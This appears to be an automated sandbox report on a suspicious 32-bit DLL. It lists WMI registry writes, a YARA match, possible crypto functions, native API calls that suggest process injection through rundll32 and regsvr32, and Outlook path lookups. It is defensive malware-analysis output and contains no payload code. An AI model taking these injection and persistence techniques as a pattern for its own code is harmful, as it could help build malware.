Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Uses 32bit PE files

Source: 61f113091fd0c.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Yara signature match

Source: 00000001.00000002.511490355.000000000134C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C14BB3	1_2_01C14BB3
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C1436E	1_2_01C1436E
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C180D0	1_2_01C180D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0DF9	1_2_00DC0DF9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0DF7	1_2_00DC0DF7
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046DF4D0	1_2_046DF4D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046D2CB8	1_2_046D2CB8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046E0CB2	1_2_046E0CB2
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046C68B2	1_2_046C68B2
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046C2D25	1_2_046C2D25
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046E1DEA	1_2_046E1DEA
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046E01A5	1_2_046E01A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CF641	1_2_046CF641
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F436E	3_2_031F436E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F4BB3	3_2_031F4BB3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F80D0	3_2_031F80D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BD2CB8	3_2_04BD2CB8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE0CB2	3_2_04BE0CB2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BDF4D0	3_2_04BDF4D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE1418	3_2_04BE1418
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE1D92	3_2_04BE1D92
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE1DEA	3_2_04BE1DEA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BC2D25	3_2_04BC2D25
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCF641	3_2_04BCF641
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BC68B2	3_2_04BC68B2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE01A5	3_2_04BE01A5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BD3924	3_2_04BD3924
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE7358	3_2_04BE7358
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120DF7	4_2_01120DF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120DF9	4_2_01120DF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EC1DEA	4_2_05EC1DEA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EA2D25	4_2_05EA2D25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EBF4D0	4_2_05EBF4D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EB2CB8	4_2_05EB2CB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EC0CB2	4_2_05EC0CB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAF641	4_2_05EAF641
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EC01A5	4_2_05EC01A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EB3924	4_2_05EB3924
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EA68B2	4_2_05EA68B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105436E	5_2_0105436E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01054BB3	5_2_01054BB3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010580D0	5_2_010580D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0DF9	5_2_00EB0DF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0DF7	5_2_00EB0DF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05112D25	5_2_05112D25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05131D92	5_2_05131D92
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05131DEA	5_2_05131DEA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05131418	5_2_05131418
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05130CB2	5_2_05130CB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05122CB8	5_2_05122CB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0512F4D0	5_2_0512F4D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511F641	5_2_0511F641
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05123924	5_2_05123924
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_051301A5	5_2_051301A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_051168B2	5_2_051168B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05137358	5_2_05137358

Contains functionality to launch a process as a different user

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_046D9499 CreateProcessAsUserW,

1_2_046D9499

Contains functionality to call native functions

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C12F8D GetProcAddress,NtCreateSection,memset,	1_2_01C12F8D
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C1373D NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_01C1373D
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C14AAF NtMapViewOfSection,	1_2_01C14AAF
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C182F5 NtQueryVirtualMemory,	1_2_01C182F5
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0880 NtAllocateVirtualMemory,	1_2_00DC0880
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0AB8 NtProtectVirtualMemory,	1_2_00DC0AB8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CB45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	1_2_046CB45A
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CD4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_046CD4F4
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CE4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	1_2_046CE4DC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046D70AC NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_046D70AC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046D4560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	1_2_046D4560
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046E3E7D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_046E3E7D
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046DD6E3 NtQueryInformationProcess,	1_2_046DD6E3
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046DBEBC GetProcAddress,NtCreateSection,memset,	1_2_046DBEBC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046C6F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	1_2_046C6F70
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046D0FE0 NtMapViewOfSection,	1_2_046D0FE0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CA7FE memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,	1_2_046CA7FE
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CAFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	1_2_046CAFD1
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CECE9 NtGetContextThread,RtlNtStatusToDosError,	1_2_046CECE9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046DF0CC memset,NtQueryInformationProcess,	1_2_046DF0CC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046C1D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	1_2_046C1D70
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046D595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_046D595B
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046DA1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	1_2_046DA1FC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046E2588 NtQuerySystemInformation,RtlNtStatusToDosError,	1_2_046E2588
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046C3EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	1_2_046C3EBE
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046D630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	1_2_046D630F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F373D NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_031F373D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F2F8D GetProcAddress,NtCreateSection,memset,	3_2_031F2F8D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F4AAF NtMapViewOfSection,	3_2_031F4AAF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F82F5 NtQueryVirtualMemory,	3_2_031F82F5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCD4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_04BCD4F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCE4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	3_2_04BCE4DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCB45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	3_2_04BCB45A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BD4560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	3_2_04BD4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BDBEBC GetProcAddress,NtCreateSection,memset,	3_2_04BDBEBC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BDD6E3 NtQueryInformationProcess,	3_2_04BDD6E3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE3E7D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	3_2_04BE3E7D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCA7FE memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,	3_2_04BCA7FE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BD0FE0 NtMapViewOfSection,	3_2_04BD0FE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCAFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	3_2_04BCAFD1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BC6F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	3_2_04BC6F70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BD70AC NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	3_2_04BD70AC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCECE9 NtGetContextThread,RtlNtStatusToDosError,	3_2_04BCECE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE2588 NtQuerySystemInformation,RtlNtStatusToDosError,	3_2_04BE2588
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BC1D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	3_2_04BC1D70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BC3EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	3_2_04BC3EBE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BDF0CC memset,NtQueryInformationProcess,	3_2_04BDF0CC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BDA1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	3_2_04BDA1FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BD595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	3_2_04BD595B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BD630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	3_2_04BD630F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120880 NtAllocateVirtualMemory,	4_2_01120880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120AB8 NtProtectVirtualMemory,	4_2_01120AB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EB4560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	4_2_05EB4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAD4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	4_2_05EAD4F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAE4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	4_2_05EAE4DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAB45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	4_2_05EAB45A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAAFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	4_2_05EAAFD1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EA6F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	4_2_05EA6F70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EBD6E3 NtQueryInformationProcess,	4_2_05EBD6E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EC2588 NtQuerySystemInformation,RtlNtStatusToDosError,	4_2_05EC2588
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EA1D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	4_2_05EA1D70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAECE9 NtGetContextThread,RtlNtStatusToDosError,	4_2_05EAECE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EA3EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	4_2_05EA3EBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EC3E7D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	4_2_05EC3E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EBA1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	4_2_05EBA1FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EB595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	4_2_05EB595B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EBF0CC memset,NtQueryInformationProcess,	4_2_05EBF0CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EB70AC NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	4_2_05EB70AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EB630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	4_2_05EB630F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105373D NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	5_2_0105373D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01052F8D GetProcAddress,NtCreateSection,memset,	5_2_01052F8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01054AAF NtMapViewOfSection,	5_2_01054AAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010582F5 NtQueryVirtualMemory,	5_2_010582F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0AB8 NtProtectVirtualMemory,	5_2_00EB0AB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0880 NtAllocateVirtualMemory,	5_2_00EB0880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05124560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	5_2_05124560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511B45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	5_2_0511B45A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511E4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	5_2_0511E4DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511D4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	5_2_0511D4F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05116F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	5_2_05116F70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511AFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	5_2_0511AFD1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0512D6E3 NtQueryInformationProcess,	5_2_0512D6E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05111D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	5_2_05111D70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05132588 NtQuerySystemInformation,RtlNtStatusToDosError,	5_2_05132588
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511ECE9 NtGetContextThread,RtlNtStatusToDosError,	5_2_0511ECE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05133E7D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	5_2_05133E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05113EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	5_2_05113EBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0512595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	5_2_0512595B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0512A1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	5_2_0512A1FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_051270AC NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	5_2_051270AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0512F0CC memset,NtQueryInformationProcess,	5_2_0512F0CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0512630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	5_2_0512630F

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Tries to load missing DLLs

